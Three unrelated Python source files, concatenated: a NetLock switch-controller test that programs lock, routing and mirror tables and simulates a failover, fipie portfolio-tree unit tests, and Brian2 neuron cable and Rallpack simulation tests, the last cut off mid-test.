range(len(ipv4_table_address_list)): match_spec = netlock_ipv4_route_match_spec_t(ipv4_table_address_list[i]) action_spec = netlock_set_egress_action_spec_t(ipv4_table_port_list[i]) entry_hdl = test.client.ipv4_route_table_add_with_set_egress( sess_hdl, dev_tgt, match_spec, action_spec) test.entry_hdls_ipv4.append(entry_hdl) test.client.ipv4_route_2_set_default_action__drop(sess_hdl, dev_tgt) for i in range(len(ipv4_table_address_list)): match_spec = netlock_ipv4_route_2_match_spec_t(ipv4_table_address_list[i]) action_spec = netlock_set_egress_action_spec_t(ipv4_table_port_list[i]) entry_hdl = test.client.ipv4_route_2_table_add_with_set_egress_2( sess_hdl, dev_tgt, match_spec, action_spec) test.entry_hdls_ipv4_2.append(entry_hdl) ## Add multiple servers server_node_num = int(test_param_get('server_node_num')) # add entries for other tables priority_0 = 1 for i in range(server_node_num): match_spec = netlock_forward_to_server_table_match_spec_t(i, server_node_num - 1) action_spec = netlock_forward_to_server_action_action_spec_t(ipv4_table_address_list[11 - i]) entry_hdl = test.client.forward_to_server_table_table_add_with_forward_to_server_action(sess_hdl, dev_tgt, match_spec, priority_0, action_spec) test.entry_forward_to_server_table.append(entry_hdl) for i in range(len(ipv4_table_address_list)): match_spec = netlock_get_tenant_inf_table_match_spec_t(ipv4_table_address_list[i]) action_spec = netlock_get_tenant_inf_action_action_spec_t(tgt_tenant[i], 500000000) entry_hdl = test.client.get_tenant_inf_table_table_add_with_get_tenant_inf_action( sess_hdl, dev_tgt, match_spec, action_spec) test.entry_get_tenant_inf_table.append(entry_hdl) match_spec = netlock_acquire_lock_table_match_spec_t(SHARED_LOCK) entry_hdl = test.client.acquire_lock_table_table_add_with_acquire_shared_lock_action( sess_hdl, dev_tgt, match_spec) test.entry_acquire_lock_table.append(entry_hdl) match_spec = netlock_acquire_lock_table_match_spec_t(EXCLUSIVE_LOCK) entry_hdl = test.client.acquire_lock_table_table_add_with_acquire_exclusive_lock_action( sess_hdl, dev_tgt, match_spec) test.entry_acquire_lock_table.append(entry_hdl) match_spec_0 = netlock_dec_empty_slots_table_match_spec_t(0) # normal acquire match_spec_1 = netlock_dec_empty_slots_table_match_spec_t(2) # server push back entry_hdl_0 = test.client.dec_empty_slots_table_table_add_with_dec_empty_slots_action( sess_hdl, dev_tgt, match_spec_0) entry_hdl_1 = test.client.dec_empty_slots_table_table_add_with_push_back_action( sess_hdl, dev_tgt, match_spec_1) test.entry_dec_empty_slots_table.append(entry_hdl_0) test.entry_dec_empty_slots_table.append(entry_hdl_1) priority_0 = 1 for i in range(len(fix_src_port)): match_spec = netlock_fix_src_port_table_match_spec_t(i, len(fix_src_port) - 1) action_spec = netlock_fix_src_port_action_action_spec_t(fix_src_port[i]) entry_hdl = test.client.fix_src_port_table_table_add_with_fix_src_port_action( sess_hdl, dev_tgt, match_spec, priority_0, action_spec) test.entry_fix_src_port_table.append(entry_hdl) for i in range(len(udp_src_port_list)): match_spec = netlock_change_mode_table_match_spec_t(i, len(udp_src_port_list) - 1) action_spec = netlock_change_mode_act_action_spec_t(udp_src_port_list[i]) entry_hdl = test.client.change_mode_table_table_add_with_change_mode_act( sess_hdl, dev_tgt, match_spec, priority_0, action_spec) test.entry_change_mode_table.append(entry_hdl) match_spec_0_0 = netlock_set_tag_table_match_spec_t(0, 0) match_spec_0_1 = netlock_set_tag_table_match_spec_t(0, 1) match_spec_1_0 = netlock_set_tag_table_match_spec_t(1, 0) match_spec_1_1 = netlock_set_tag_table_match_spec_t(1, 1) entry_hdl_0 = test.client.set_tag_table_table_add_with_set_as_primary_action( sess_hdl, dev_tgt, match_spec_0_0) entry_hdl_1 = test.client.set_tag_table_table_add_with_set_as_secondary_action( sess_hdl, dev_tgt, match_spec_0_1) entry_hdl_2 = test.client.set_tag_table_table_add_with_set_as_primary_action( sess_hdl, dev_tgt, match_spec_1_0) entry_hdl_3 = test.client.set_tag_table_table_add_with_set_as_failure_notification_action( sess_hdl, dev_tgt, match_spec_1_1) test.entry_set_tag_table.append(entry_hdl_0) test.entry_set_tag_table.append(entry_hdl_1) test.entry_set_tag_table.append(entry_hdl_2) test.entry_set_tag_table.append(entry_hdl_3) zero_v = netlock_shared_and_exclusive_count_register_value_t(0, 0) tot_lk = int(test_param_get('lk')) hmap = [0 for i in range(tot_lk + 1)] if (test_param_get('slot') != None): slot_num = int(test_param_get('slot')) else: slot_num = MAX_SLOTS_NUM hash_v = 0 task_id = test_param_get('task_id') if (test_param_get('bm') == 'x') and (task_id != 'e'): #### microbenchmark exclusive lock low contention tot_num_lks = tot_lk qs = slot_num / tot_lk slots_v = netlock_slots_two_sides_register_value_t(0, qs) for i in range(1, tot_lk + 1): slots_v_list.append(slots_v) test.client.register_write_left_bound_register(sess_hdl, dev_tgt, i, qs*(i-1) + 1) left_bound_list.append(qs*(i-1) + 1) test.client.register_write_right_bound_register(sess_hdl, dev_tgt, i, qs*i) test.client.register_write_head_register(sess_hdl, dev_tgt, i, qs*(i-1) + 1) test.client.register_write_tail_register(sess_hdl, dev_tgt, i, qs*(i-1) + 1) test.client.register_write_shared_and_exclusive_count_register(sess_hdl, dev_tgt, i, zero_v) test.client.register_write_queue_size_op_register(sess_hdl, dev_tgt, i, 0) test.client.register_write_slots_two_sides_register(sess_hdl, dev_tgt, i, slots_v) #### CHANGE according to memory management match_spec = netlock_check_lock_exist_table_match_spec_t(i) action_spec = netlock_check_lock_exist_action_action_spec_t(i) entry_hdl = test.client.check_lock_exist_table_table_add_with_check_lock_exist_action( sess_hdl, dev_tgt, match_spec, action_spec) test.entry_check_lock_exist_table.append(entry_hdl) elif (test_param_get('bm') == 's') and (task_id != 'e'): #### microbenchmark shared lock tot_num_lks = tot_lk qs = slot_num / tot_lk slots_v_qs = netlock_slots_two_sides_register_value_t(0, qs) for i in range(1, tot_lk + 1): slots_v_list.append(slots_v_qs) test.client.register_write_left_bound_register(sess_hdl, dev_tgt, i, qs*(i-1) + 1) left_bound_list.append(qs*(i-1) + 1) test.client.register_write_right_bound_register(sess_hdl, dev_tgt, i, qs*i) test.client.register_write_head_register(sess_hdl, dev_tgt, i, qs*(i-1) + 1) test.client.register_write_tail_register(sess_hdl, dev_tgt, i, qs*(i-1) + 1) test.client.register_write_shared_and_exclusive_count_register(sess_hdl, dev_tgt, i, zero_v) test.client.register_write_queue_size_op_register(sess_hdl, dev_tgt, i, 0) test.client.register_write_slots_two_sides_register(sess_hdl, dev_tgt, i, slots_v_qs) match_spec = netlock_check_lock_exist_table_match_spec_t(i) action_spec = netlock_check_lock_exist_action_action_spec_t(i) entry_hdl = test.client.check_lock_exist_table_table_add_with_check_lock_exist_action( sess_hdl, dev_tgt, match_spec, action_spec) test.entry_check_lock_exist_table.append(entry_hdl) elif ((test_param_get('bm') == 't') or (test_param_get('bm') == 'v')): #### TPCC benchmark if (test_param_get('slot') != None): slot_num = int(test_param_get('slot')) else: slot_num = MAX_SLOTS_NUM client_node_num = test_param_get('client_node_num') warehouse = test_param_get('warehouse') task_id = test_param_get('task_id') batch_size = test_param_get('batch_size') main_dir = test_param_get('main_dir') if (test_param_get('memn') == MEM_BIN_PACK): if (task_id == 'p') or (task_id == '2'): filename_suffix = "tpcc_notablelock_incast_"+client_node_num+"_w_"+warehouse + "_sl_" + str(slot_num) + "_nomap.in" elif (task_id == 'q') or (task_id == '3'): filename_suffix = "tpcc_notablelock_multiserver_"+client_node_num+"_w_"+warehouse + "_sl_" + str(slot_num) + "_nomap.in" elif (task_id == 'g'): filename_suffix = "tpcc_notablelock_incast_"+client_node_num+"_w_"+warehouse + "_sl_" + str(slot_num) + "_map_" + batch_size + ".in" elif (task_id == 'e'): filename_suffix = "empty.in" else: filename_suffix = "tpcc_notablelock_incast_"+client_node_num+"_w_"+warehouse + "_sl_" + str(slot_num) + "_nomap.in" else: filename_suffix = "tpcc_notablelock_incast_random_sn_" + str(slot_num) + ".in" # filename = "/home/zhuolong/exp/netlock-code/controller_init/tpcc/" + filename_suffix filename = main_dir + "/switch_code/netlock/controller_init/tpcc/" + filename_suffix print "Input filename:",filename if (filename != "null"): fin = open(filename) start_bound = 0 while True: line = fin.readline() if not line: break words = [x.strip() for x in line.split(',')] lk = int(words[0]) + 1 hash_v += 1 hmap[lk] = hash_v lk_num = int(words[1]) slots_v = netlock_slots_two_sides_register_value_t(0, lk_num) slots_v_list.append(slots_v) test.client.register_write_left_bound_register(sess_hdl, dev_tgt, hash_v, start_bound + 1) left_bound_list.append(start_bound + 1) test.client.register_write_right_bound_register(sess_hdl, dev_tgt, hash_v, start_bound + lk_num) test.client.register_write_head_register(sess_hdl, dev_tgt, hash_v, start_bound + 1) test.client.register_write_tail_register(sess_hdl, dev_tgt, hash_v, start_bound + 1) test.client.register_write_shared_and_exclusive_count_register(sess_hdl, dev_tgt, hash_v, zero_v) test.client.register_write_queue_size_op_register(sess_hdl, dev_tgt, hash_v, 0) test.client.register_write_slots_two_sides_register(sess_hdl, dev_tgt, hash_v, slots_v) match_spec = netlock_check_lock_exist_table_match_spec_t(lk) action_spec = netlock_check_lock_exist_action_action_spec_t(hash_v) entry_hdl = test.client.check_lock_exist_table_table_add_with_check_lock_exist_action( sess_hdl, dev_tgt, match_spec, action_spec) test.entry_check_lock_exist_table.append(entry_hdl) start_bound = start_bound + lk_num tot_num_lks = hash_v def clean_tables(test, sess_hdl, dev_id): if (test.entry_hdls_ipv4): print "Deleting %d entries" % len(test.entry_hdls_ipv4) for entry_hdl in test.entry_hdls_ipv4: status = test.client.ipv4_route_table_delete( sess_hdl, dev_id, entry_hdl) if (test.entry_hdls_ipv4_2): print "Deleting %d entries" % len(test.entry_hdls_ipv4_2) for entry_hdl in test.entry_hdls_ipv4_2: status = test.client.ipv4_route_2_table_delete( sess_hdl, dev_id, entry_hdl) if (test.entry_ethernet_set_mac): print "Deleting %d entries" % len(test.entry_ethernet_set_mac) for entry_hdl in test.entry_ethernet_set_mac: status = test.client.ethernet_set_mac_delete( sess_hdl, dev_id, entry_hdl) if (test.entry_acquire_lock_table): print "Deleting %d entries" % len(test.entry_acquire_lock_table) for entry_hdl in test.entry_acquire_lock_table: status = test.client.acquire_lock_table_table_delete( sess_hdl, dev_id, entry_hdl) if (test.entry_dec_empty_slots_table): print "Deleting %d entries" % len(test.entry_dec_empty_slots_table) for entry_hdl in test.entry_dec_empty_slots_table: status = test.client.dec_empty_slots_table_table_delete( sess_hdl, dev_id, entry_hdl) if (test.entry_fix_src_port_table): print "Deleting %d entries" % len(test.entry_fix_src_port_table) for entry_hdl in test.entry_fix_src_port_table: status = test.client.fix_src_port_table_table_delete( sess_hdl, dev_id, entry_hdl) if (test.entry_check_lock_exist_table): print "Deleting %d entries" % len(test.entry_check_lock_exist_table) for entry_hdl in test.entry_check_lock_exist_table: status = test.client.check_lock_exist_table_table_delete( sess_hdl, dev_id, entry_hdl) if (test.entry_set_tag_table): print "Deleting %d entries" % len(test.entry_set_tag_table) for entry_hdl in test.entry_set_tag_table: status = test.client.set_tag_table_table_delete( sess_hdl, dev_id, entry_hdl) if (test.entry_change_mode_table): print "Deleting %d entries" % len(test.entry_change_mode_table) for entry_hdl in test.entry_change_mode_table: status = test.client.change_mode_table_table_delete( sess_hdl, dev_id, entry_hdl) if (test.entry_forward_to_server_table): print "Deleting %d entries" % len(test.entry_forward_to_server_table) for entry_hdl in test.entry_forward_to_server_table: status = test.client.forward_to_server_table_table_delete( sess_hdl, dev_id, entry_hdl) if (test.entry_get_tenant_inf_table): print "Deleting %d entries" % len(test.entry_get_tenant_inf_table) for entry_hdl in test.entry_get_tenant_inf_table: status = test.client.get_tenant_inf_table_table_delete( sess_hdl, dev_id, entry_hdl) print "closing session" status = test.conn_mgr.client_cleanup(sess_hdl) def failure_sim(test, sess_hdl, dev_tgt): global tot_num_lks print "failover BEGIN." sys.stdout.flush() # set failure_status to failure (failure_status_register) test.client.register_write_failure_status_register(sess_hdl, dev_tgt, 0, 1) # set head,tail register zero_v = netlock_shared_and_exclusive_count_register_value_t(0, 0) read_flags = netlock_register_flags_t(read_hw_sync = True) for i in range(1, tot_num_lks + 1): k_left = left_bound_list[i - 1] test.client.register_write_head_register(sess_hdl, dev_tgt, i, k_left) test.client.register_write_tail_register(sess_hdl, dev_tgt, i, k_left) test.client.register_write_shared_and_exclusive_count_register(sess_hdl, dev_tgt, i, zero_v) test.client.register_write_slots_two_sides_register(sess_hdl, dev_tgt, i, slots_v_list[i-1]) # set failure_status to normal test.client.register_write_failure_status_register(sess_hdl, dev_tgt, 0, 0) return class AcquireLockTest(pd_base_tests.ThriftInterfaceDataPlane): def __init__(self): pd_base_tests.ThriftInterfaceDataPlane.__init__(self, ["netlock"]) scapy_netlock_bindings() def runTest(self): #self.pkt.init() #sess_pkt = self.pkt.client_init() print "========== acquire lock test ==========" sess_hdl = self.conn_mgr.client_init() self.sids = [] try: if (test_param_get('target') == 'hw'): addPorts(self) else: print "test_param_get(target):", test_param_get('target') sids = random.sample(xrange(BASE_SID_NORM, MAX_SID_NORM), len(swports)) for port,sid in zip(swports[0:len(swports)], sids[0:len(sids)]): ip_address = port_ip_dic[port] match_spec = netlock_i2e_mirror_table_match_spec_t(ip_address) action_spec = netlock_i2e_mirror_action_action_spec_t(sid) result = self.client.i2e_mirror_table_table_add_with_i2e_mirror_action(sess_hdl, dev_tgt, match_spec, action_spec) info = mirror_session(MirrorType_e.PD_MIRROR_TYPE_NORM, Direction_e.PD_DIR_INGRESS, sid, port, True) print "port:", port, "; sid:", sid sys.stdout.flush() self.mirror.mirror_session_create(sess_hdl, dev_tgt, info) self.sids.append(sid) self.conn_mgr.complete_operations(sess_hdl) for sid in self.sids: self.mirror.mirror_session_enable(sess_hdl, Direction_e.PD_DIR_INGRESS, dev_tgt, sid) self.conn_mgr.complete_operations(sess_hdl) read_flags = netlock_register_flags_t(read_hw_sync = True) init_tables(self, sess_hdl, dev_tgt) self.conn_mgr.complete_operations(sess_hdl) self.devport_mgr.devport_mgr_set_copy_to_cpu(dev_id, True, cpu_port) print "INIT Finished." sys.stdout.flush() wait_time = 0 while (True): if (test_param_get('task_id') == 'f'): if (wait_time == 122): failure_sim(self, sess_hdl, dev_tgt) print "failover FINISHED." sys.stdout.flush() if (wait_time <= 122): wait_time += 1 count_0 = netlock_tenant_acq_counter_register_value_t(0, 0) for i in range(13): self.client.register_write_tenant_acq_counter_register(sess_hdl, dev_tgt, i, count_0) time.sleep(1) self.conn_mgr.complete_operations(sess_hdl) finally: for sid in self.sids: self.mirror.mirror_session_disable(sess_hdl, Direction_e.PD_DIR_INGRESS, dev_tgt, sid) for sid in self.sids: self.mirror.mirror_session_delete(sess_hdl, dev_tgt, sid) clean_tables(self, sess_hdl, dev_id)
python
from fipie import NoCluster, EqualWeight from fipie.data import load_example_data from fipie.tree import Tree, create_tree def test_create_tree(): price = load_example_data() ret = price.asfreq('w', method='pad').pct_change() tree = create_tree(ret, NoCluster()) assert len(tree.nodes) == ret.shape[1] + 1 root = tree.nodes[0] node = tree.nodes[1] assert str(root) == 'Node(root)' assert str(node) == 'Node(SPY)' assert str(tree) == 'Tree' assert not root.is_leaf assert node.is_leaf assert root.level == 0 assert node.level == 1 def test_tree_show(): price = load_example_data() ret = price.asfreq('w', method='pad').pct_change() tree = create_tree(ret, NoCluster()) tree.show() def test_init_weight(): price = load_example_data() ret = price.asfreq('w', method='pad').pct_change() tree = create_tree(ret, NoCluster()) tree.set_local_weights(EqualWeight()) node = tree.nodes[1] assert node.is_weight_set() tree.init_weights() assert not node.is_weight_set()
python
from __future__ import absolute_import import os import itertools from numpy.testing import assert_equal import pytest from brian2 import * from brian2.devices.device import reinit_and_delete from brian2.tests.utils import assert_allclose @pytest.mark.codegen_independent def test_custom_events(): # Set (could be moved in a setup) EL = -65*mV gL = 0.0003*siemens/cm**2 ev = ''' Im = gL * (EL - v) : amp/meter**2 event_time1 : second ''' # Create a three compartments morphology morpho = Soma(diameter=10*um) morpho.dend1 = Cylinder(n=1, diameter=1*um, length=10*um ) morpho.dend2 = Cylinder(n=1, diameter=1*um, length=10*um ) G = SpatialNeuron(morphology=morpho, model=ev, events={'event1': 't>=i*ms and t<i*ms+dt'}) G.run_on_event('event1', 'event_time1 = 0.1*ms') run(0.2*ms) # Event has size three now because there are three compartments assert_allclose(G.event_time1[:], [0.1, 0, 0]*ms) @pytest.mark.codegen_independent def test_construction(): BrianLogger.suppress_name('resolution_conflict') morpho = Soma(diameter=30*um) morpho.L = Cylinder(length=10*um, diameter=1*um, n=10) morpho.LL = Cylinder(length=5*um, diameter=2*um, n=5) morpho.LR = Cylinder(length=5*um, diameter=2*um, n=10) morpho.right = Cylinder(length=3*um, diameter=1*um, n=7) morpho.right.nextone = Cylinder(length=2*um, diameter=1*um, n=3) gL=1e-4*siemens/cm**2 EL=-70*mV eqs=''' Im=gL*(EL-v) : amp/meter**2 I : meter (point current) ''' # Check units of currents with pytest.raises(DimensionMismatchError): SpatialNeuron(morphology=morpho, model=eqs) eqs=''' Im=gL*(EL-v) : amp/meter**2 ''' neuron = SpatialNeuron(morphology=morpho, model=eqs, Cm=1 * uF / cm ** 2, Ri=100 * ohm * cm) # Test initialization of values neuron.LL.v = EL assert_allclose(neuron.L.main.v, 0*mV) assert_allclose(neuron.LL.v, EL) neuron.LL[1*um:3*um].v = 0*mV assert_allclose(neuron.LL.v, Quantity([EL, 0*mV, 0*mV, EL, EL])) assert_allclose(neuron.Cm, 1 * uF / cm ** 2) # Test morphological variables assert_allclose(neuron.L.main.distance, morpho.L.distance) assert_allclose(neuron.L.main.area, morpho.L.area) assert_allclose(neuron.L.main.length, morpho.L.length) # Check basic consistency of the flattened representation assert all(neuron.diffusion_state_updater._ends[:].flat >= neuron.diffusion_state_updater._starts[:].flat) # Check that length and distances make sense assert_allclose(sum(morpho.L.length), 10*um) assert_allclose(morpho.L.distance, (0.5 + np.arange(10))*um) assert_allclose(sum(morpho.LL.length), 5*um) assert_allclose(morpho.LL.distance, (10 + .5 + np.arange(5))*um) assert_allclose(sum(morpho.LR.length), 5*um) assert_allclose(morpho.LR.distance, (10 + 0.25 + np.arange(10)*0.5)*um) assert_allclose(sum(morpho.right.length), 3*um) assert_allclose(morpho.right.distance, (0.5 + np.arange(7))*3./7.*um) assert_allclose(sum(morpho.right.nextone.length), 2*um) assert_allclose(morpho.right.nextone.distance, 3*um + (0.5 + np.arange(3))*2./3.*um) @pytest.mark.codegen_independent def test_construction_coordinates(): # Same as test_construction, but uses coordinates instead of lengths to # set up everything # Note that all coordinates here are relative to the origin of the # respective cylinder BrianLogger.suppress_name('resolution_conflict') morpho = Soma(diameter=30*um) morpho.L = Cylinder(x=[0, 10]*um, diameter=1*um, n=10) morpho.LL = Cylinder(y=[0, 5]*um, diameter=2*um, n=5) morpho.LR = Cylinder(z=[0, 5]*um, diameter=2*um, n=10) morpho.right = Cylinder(x=[0, sqrt(2)*1.5]*um, y=[0, sqrt(2)*1.5]*um, diameter=1*um, n=7) morpho.right.nextone = Cylinder(y=[0, sqrt(2)]*um, z=[0, sqrt(2)]*um, diameter=1*um, n=3) gL=1e-4*siemens/cm**2 EL=-70*mV eqs=''' Im=gL*(EL-v) : amp/meter**2 I : meter (point current) ''' # Check units of currents with pytest.raises(DimensionMismatchError): SpatialNeuron(morphology=morpho, model=eqs) eqs=''' Im=gL*(EL-v) : amp/meter**2 ''' neuron = SpatialNeuron(morphology=morpho, model=eqs, Cm=1 * uF / cm ** 2, Ri=100 * ohm * cm) # Test initialization of values neuron.LL.v = EL assert_allclose(neuron.L.main.v, 0*mV) assert_allclose(neuron.LL.v, EL) neuron.LL[1*um:3*um].v = 0*mV assert_allclose(neuron.LL.v, Quantity([EL, 0*mV, 0*mV, EL, EL])) assert_allclose(neuron.Cm, 1 * uF / cm ** 2) # Test morphological variables assert_allclose(neuron.L.main.x, morpho.L.x) assert_allclose(neuron.LL.main.x, morpho.LL.x) assert_allclose(neuron.right.main.x, morpho.right.x) assert_allclose(neuron.L.main.distance, morpho.L.distance) # assert_allclose(neuron.L.main.diameter, morpho.L.diameter) assert_allclose(neuron.L.main.area, morpho.L.area) assert_allclose(neuron.L.main.length, morpho.L.length) # Check basic consistency of the flattened representation assert all(neuron.diffusion_state_updater._ends[:].flat >= neuron.diffusion_state_updater._starts[:].flat) # Check that length and distances make sense assert_allclose(sum(morpho.L.length), 10*um) assert_allclose(morpho.L.distance, (0.5 + np.arange(10))*um) assert_allclose(sum(morpho.LL.length), 5*um) assert_allclose(morpho.LL.distance, (10 + .5 + np.arange(5))*um) assert_allclose(sum(morpho.LR.length), 5*um) assert_allclose(morpho.LR.distance, (10 + 0.25 + np.arange(10)*0.5)*um) assert_allclose(sum(morpho.right.length), 3*um) assert_allclose(morpho.right.distance, (0.5 + np.arange(7))*3./7.*um) assert_allclose(sum(morpho.right.nextone.length), 2*um) assert_allclose(morpho.right.nextone.distance, 3*um + (0.5 + np.arange(3))*2./3.*um) @pytest.mark.long def test_infinitecable(): ''' Test simulation of an infinite cable vs. theory for current pulse (Green function) ''' BrianLogger.suppress_name('resolution_conflict') defaultclock.dt = 0.001*ms # Morphology diameter = 1*um Cm = 1 * uF / cm ** 2 Ri = 100 * ohm * cm N = 500 morpho=Cylinder(diameter=diameter,length=3*mm,n=N) # Passive channels gL=1e-4*siemens/cm**2 eqs=''' Im=-gL*v : amp/meter**2 I : amp (point current) ''' neuron = SpatialNeuron(morphology=morpho, model=eqs, Cm=Cm, Ri=Ri) # Monitors mon=StateMonitor(neuron,'v',record=N/2-20) neuron.I[len(neuron)//2]=1*nA # injecting in the middle run(0.02*ms) neuron.I=0*amp run(3*ms) t = mon.t v = mon[N//2-20].v # Theory (incorrect near cable ends) x = 20*morpho.length[0] la = neuron.space_constant[0] taum = Cm/gL # membrane time constant theory = 1./(la*Cm*pi*diameter)*sqrt(taum/(4*pi*(t+defaultclock.dt)))*\ exp(-(t+defaultclock.dt)/taum-taum/(4*(t+defaultclock.dt))*(x/la)**2) theory = theory*1*nA*0.02*ms assert_allclose(v[t>0.5*ms],theory[t>0.5*ms], rtol=1e14, atol=1e10) # high error tolerance (not exact because not infinite cable) @pytest.mark.standalone_compatible def test_finitecable(): ''' Test simulation of short cylinder vs. theory for constant current. ''' if prefs.core.default_float_dtype is np.float32: pytest.skip('Need double precision for this test') BrianLogger.suppress_name('resolution_conflict') defaultclock.dt = 0.01*ms # Morphology diameter = 1*um length = 300*um Cm = 1 * uF / cm ** 2 Ri = 150 * ohm * cm N = 200 morpho=Cylinder(diameter=diameter,length=length,n=N) # Passive channels gL=1e-4*siemens/cm**2 EL=-70*mV eqs=''' Im=gL*(EL-v) : amp/meter**2 I : amp (point current) ''' neuron = SpatialNeuron(morphology=morpho, model=eqs, Cm=Cm, Ri=Ri) neuron.v = EL neuron.I[0]=0.02*nA # injecting at the left end run(100*ms) # Theory x = neuron.distance v = neuron.v la = neuron.space_constant[0] ra = la*4*Ri/(pi*diameter**2) theory = EL+ra*neuron.I[0]*cosh((length-x)/la)/sinh(length/la) assert_allclose(v-EL, theory-EL, rtol=1e12, atol=1e8) @pytest.mark.standalone_compatible def test_rallpack1(): ''' Rallpack 1 ''' if prefs.core.default_float_dtype is np.float32: pytest.skip('Need double precision for this test') defaultclock.dt = 0.05*ms # Morphology diameter = 1*um length = 1*mm Cm = 1 * uF / cm ** 2 Ri = 100 * ohm * cm N = 1000 morpho = Cylinder(diameter=diameter, length=length, n=N) # Passive channels gL = 1./(40000*ohm*cm**2) EL = -65*mV eqs = ''' Im = gL*(EL - v) : amp/meter**2 I : amp (point current, constant) ''' neuron = SpatialNeuron(morphology=morpho, model=eqs, Cm=Cm, Ri=Ri) neuron.v = EL neuron.I[0] = 0.1*nA # injecting at the left end #Record at the two ends mon = StateMonitor(neuron, 'v', record=[0, 999], when='start', dt=0.05*ms) run(250*ms + defaultclock.dt) # Load the theoretical results basedir = os.path.join(os.path.abspath(os.path.dirname(__file__)), 'rallpack_data') data_0 = np.loadtxt(os.path.join(basedir, 'ref_cable.0')) data_x = np.loadtxt(os.path.join(basedir, 'ref_cable.x')) scale_0 = max(data_0[:, 1]*volt) - min(data_0[:, 1]*volt) scale_x = max(data_x[:, 1]*volt) - min(data_x[:, 1]*volt) squared_diff_0 = (data_0[:, 1] * volt - mon[0].v)**2 squared_diff_x = (data_x[:, 1] * volt - mon[999].v)**2 rel_RMS_0 = sqrt(mean(squared_diff_0))/scale_0 rel_RMS_x = sqrt(mean(squared_diff_x))/scale_x max_rel_0 = sqrt(max(squared_diff_0))/scale_0 max_rel_x = sqrt(max(squared_diff_x))/scale_x # sanity check: times are the same assert_allclose(mon.t/second, data_0[:, 0]) assert_allclose(mon.t/second, data_x[:, 0]) # RMS error should be < 0.1%, maximum error along the curve should be < 0.5% assert 100*rel_RMS_0 < 0.1 assert 100*rel_RMS_x < 0.1 assert 100*max_rel_0 < 0.5 assert 100*max_rel_x < 0.5 @pytest.mark.standalone_compatible def test_rallpack2(): ''' Rallpack 2 ''' if prefs.core.default_float_dtype is np.float32: pytest.skip('Need double precision for this test') defaultclock.dt = 0.1*ms # Morphology diameter = 32*um length = 16*um Cm = 1 * uF / cm ** 2 Ri = 100 * ohm * cm # Construct binary tree according to Rall's formula morpho = Cylinder(n=1, diameter=diameter, y=[0, float(length)]*meter) endpoints = {morpho} for depth in range(1, 10): diameter /= 2.**(1./3.) length /= 2.**(2./3.) new_endpoints = set() for endpoint in endpoints: new_L = Cylinder(n=1, diameter=diameter, length=length) new_R = Cylinder(n=1, diameter=diameter, length=length) new_endpoints.add(new_L) new_endpoints.add(new_R) endpoint.L = new_L endpoint.R = new_R endpoints = new_endpoints # Passive channels gL = 1./(40000*ohm*cm**2) EL = -65*mV eqs = ''' Im = gL*(EL - v) : amp/meter**2 I : amp (point current, constant) ''' neuron = SpatialNeuron(morphology=morpho, model=eqs, Cm=Cm, Ri=Ri, method='rk4') neuron.v = EL neuron.I[0] = 0.1*nA # injecting at the origin endpoint_indices = [endpoint.indices[0] for endpoint in endpoints] mon = StateMonitor(neuron, 'v', record=[0] + endpoint_indices, when='start', dt=0.1*ms) run(250*ms + defaultclock.dt) # Load the theoretical results basedir = os.path.join(os.path.abspath(os.path.dirname(__file__)), 'rallpack_data') # Only use very second time step, since we run with 0.1ms instead of 0.05ms data_0 = np.loadtxt(os.path.join(basedir, 'ref_branch.0'))[::2] data_x = np.loadtxt(os.path.join(basedir, 'ref_branch.x'))[::2] # sanity check: times are the same assert_allclose(mon.t/second, data_0[:, 0]) assert_allclose(mon.t/second, data_x[:, 0]) # Check that all endpoints are the same: for endpoint in endpoints: assert_allclose(mon[endpoint].v, mon[endpoint[0]].v) scale_0 = max(data_0[:, 1]*volt) - min(data_0[:, 1]*volt) scale_x = max(data_x[:, 1]*volt) - min(data_x[:, 1]*volt) squared_diff_0 = (data_0[:, 1] * volt - mon[0].v)**2 # One endpoint squared_diff_x = (data_x[:, 1] * volt - mon[endpoint_indices[0]].v)**2 rel_RMS_0 = sqrt(mean(squared_diff_0))/scale_0 rel_RMS_x = sqrt(mean(squared_diff_x))/scale_x max_rel_0 = sqrt(max(squared_diff_0))/scale_0 max_rel_x = sqrt(max(squared_diff_x))/scale_x # RMS error should be < 0.25%, maximum error along the curve should be < 0.5% assert 100*rel_RMS_0 < 0.25 assert 100*rel_RMS_x < 0.25 assert 100*max_rel_0 < 0.5 assert 100*max_rel_x < 0.5 @pytest.mark.standalone_compatible @pytest.mark.long def test_rallpack3(): ''' Rallpack 3 ''' if prefs.core.default_float_dtype is np.float32: pytest.skip('Need double precision for this test') defaultclock.dt = 1*usecond # Morphology diameter = 1*um length = 1*mm N = 1000 morpho = Cylinder(diameter=diameter, length=length, n=N) # Passive properties gl = 1./(40000*ohm*cm**2) El = -65*mV Cm = 1 * uF / cm ** 2 Ri = 100 * ohm * cm # Active properties ENa = 50*mV EK = -77*mV gNa = 120*msiemens/cm**2 gK = 36*msiemens/cm**2 eqs = ''' Im = gl * (El-v) + gNa * m**3 * h * (ENa-v) + gK * n**4 * (EK-v) : amp/meter**2 dm/dt = alpham * (1-m) - betam * m : 1 dn/dt = alphan * (1-n) - betan * n : 1 dh/dt = alphah * (1-h) - betah * h : 1 v_shifted = v - El : volt alpham = (0.1/mV) * (-v_shifted+25*mV) / (exp((-v_shifted+25*mV) / (10*mV)) - 1)/ms : Hz betam = 4 * exp(-v_shifted/(18*mV))/ms : Hz alphah = 0.07 * exp(-v_shifted/(20*mV))/ms : Hz betah = 1/(exp((-v_shifted+30*mV) / (10*mV)) + 1)/ms : Hz alphan = (0.01/mV) * (-v_shifted+10*mV) / (exp((-v_shifted+10*mV) / (10*mV)) - 1)/ms : Hz betan = 0.125*exp(-v_shifted/(80*mV))/ms : Hz I : amp (point current, constant) ''' axon = SpatialNeuron(morphology=morpho, model=eqs, Cm=Cm, Ri=Ri, method='exponential_euler') axon.v = El # Pre-calculated equilibrium values at v = El axon.m = 0.0529324852572 axon.n = 0.317676914061 axon.h = 0.596120753508 axon.I[0] = 0.1*nA # injecting at the left end #Record at the two ends mon = StateMonitor(axon, 'v', record=[0, 999], when='start', dt=0.05*ms) run(250*ms + defaultclock.dt) # Load the theoretical results basedir = os.path.join(os.path.abspath(os.path.dirname(__file__)), 'rallpack_data') data_0 = np.loadtxt(os.path.join(basedir, 'ref_axon.0.neuron')) data_x = np.loadtxt(os.path.join(basedir, 'ref_axon.x.neuron')) # sanity check: times are the same assert_allclose(mon.t/second, data_0[:, 0]) assert_allclose(mon.t/second, data_x[:, 0]) scale_0 = max(data_0[:, 1]*volt) - min(data_0[:, 1]*volt) scale_x = max(data_x[:, 1]*volt) - min(data_x[:, 1]*volt) squared_diff_0 = (data_0[:, 1] * volt - mon[0].v)**2 